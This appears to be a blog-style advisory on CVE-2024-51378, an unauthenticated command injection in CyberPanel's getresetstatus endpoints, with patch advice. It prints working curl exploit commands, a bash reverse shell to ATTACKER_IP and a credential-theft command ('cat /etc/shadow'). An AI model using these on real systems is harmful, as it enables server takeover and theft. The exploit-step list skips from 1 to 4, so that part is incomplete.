!CyberPanel
*Image credit: CyberPanel*

Overview

A critical vulnerability, CVE-2024-51378, was found in CyberPanel—a widely used web hosting control panel built on OpenLiteSpeed. This flaw lets remote attackers bypass authentication and execute any system command via two API endpoints: /dns/getresetstatus and /ftp/getresetstatus. CyberPanel versions up to 2.3.6 and most 2.3.7 (until commit 1cc6cb) are affected. The vulnerability was exploited in-the-wild as early as October 2024 by a threat actor known as *PSAUX*.

What Is CyberPanel?

CyberPanel is a modern web hosting control panel supporting multiple web technologies and domain management via a sleek interface. Its open-source nature and easy integration with OpenLiteSpeed or LiteSpeed Enterprise have made it popular among web hosts.

The underlying bug is located in the following files

- dns/views.py
- ftp/views.py

The getresetstatus views fail to properly restrict access and filter user input, which exposes them to dangerous remote actions.

The security middleware only protects POST requests, but the endpoints also accept GET! User-controlled data is passed directly to system commands without proper sanitization.

Simplified Exploit Path

1. Attacker sends an unauthenticated GET request to either /dns/getresetstatus or /ftp/getresetstatus.

Since secMiddleware only blocks POST (and not GET), authentication can be bypassed.

4. Shell metacharacters (like ;) injected in statusfile let attackers run arbitrary shell commands as the CyberPanel service user, often with high privileges.

Sample Vulnerable Code (pseudo-Python)

def getresetstatus(request):
    statusfile = request.GET.get('statusfile')
    # Danger: No sanitization!
    output = os.popen(f'cat {statusfile}').read()
    return HttpResponse(output)

With input like statusfile=/etc/passwd, it prints the server’s password file.

But more dangerously, with statusfile=foo;id, it runs the id command!

Result:

GET /dns/getresetstatus?statusfile=foo;id HTTP/1.1

Returns

uid=995(cyberpanel) gid=995(cyberpanel) groups=995(cyberpanel)

A simple curl request

curl "http://target.site:809/dns/getresetstatus?statusfile=x;id";

Or, for remote reverse shell (dangerous!)

curl "http://target.site:809/ftp/getresetstatus?statusfile=foo;bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 >&1'"

The statusfile parameter isn’t validated or sanitized.

- Security middleware (secMiddleware) was applied only to *POST* requests—attackers could just use *GET*.

Exploit In-The-Wild

As reported by exploit-db and confirmed in security threads, exploitation began in October 2024. Attackers used automated scripts to find exposed CyberPanel installations and executed commands to:
- Steal credentials (cat /etc/shadow)
- Install malware/miners

How To Check If You’re Vulnerable

If running CyberPanel ≤ 2.3.6 or an unpatched 2.3.7 (check if commit 1cc6cb is present), your server is at risk.

To check, try accessing

http://your-server:809/dns/getresetstatus?statusfile=;id

If you see the result of the id command, you’re vulnerable!

Patch & Mitigation

- Update to latest CyberPanel _after commit 1cc6cb_ (late October 2024 or later).

In dns/views.py and ftp/views.py, always validate input like this

import os
import re

def is_safe_path(p):
    # Accept only alphanumeric and . or /
    return re.match(r'^[\w./-]+$', p)

def getresetstatus(request):
    statusfile = request.GET.get('statusfile')
    if not is_safe_path(statusfile):
        return HttpResponseForbidden()
    # Proceed safely

Or, better yet, avoid calling shell commands with user input!

References and Further Reading

- GitHub CyberPanel commit 1cc6cb: Patch for getresetstatus
- Exploit-DB PoC (published Oct 2024)
- CyberPanel Security Announcements
- CVE-2024-51378 Detail at MITRE

Summary Table

| Affected | Risk Level | Remote Exploit? | Exploited In Wild? | Patched? |
|--------------------|------------|-----------------|--------------------|----------|
| ≤ 2.3.6, 2.3.7 pre-commit 1cc6cb | CRITICAL | YES | YES (PSAUX, Oct 2024) | YES |

Conclusion

CVE-2024-51378 in CyberPanel is dangerously simple to exploit and has been abused by attackers. Patch immediately, lock down your panel, and review logs for suspicious GET requests to /getresetstatus.

Questions?
Ask in the CyberPanel community forum or inspect your server *now*.

Stay secure and always sanitize user input, especially in admin panels exposed to the web.

*Exclusive breakdown by [YourSecurityGuy]*
*Do not repost without attribution.*

Timeline

Published on: 10/29/2024 23:15:04 UTC
Last modified on: 12/06/2024 18:17:17 UTC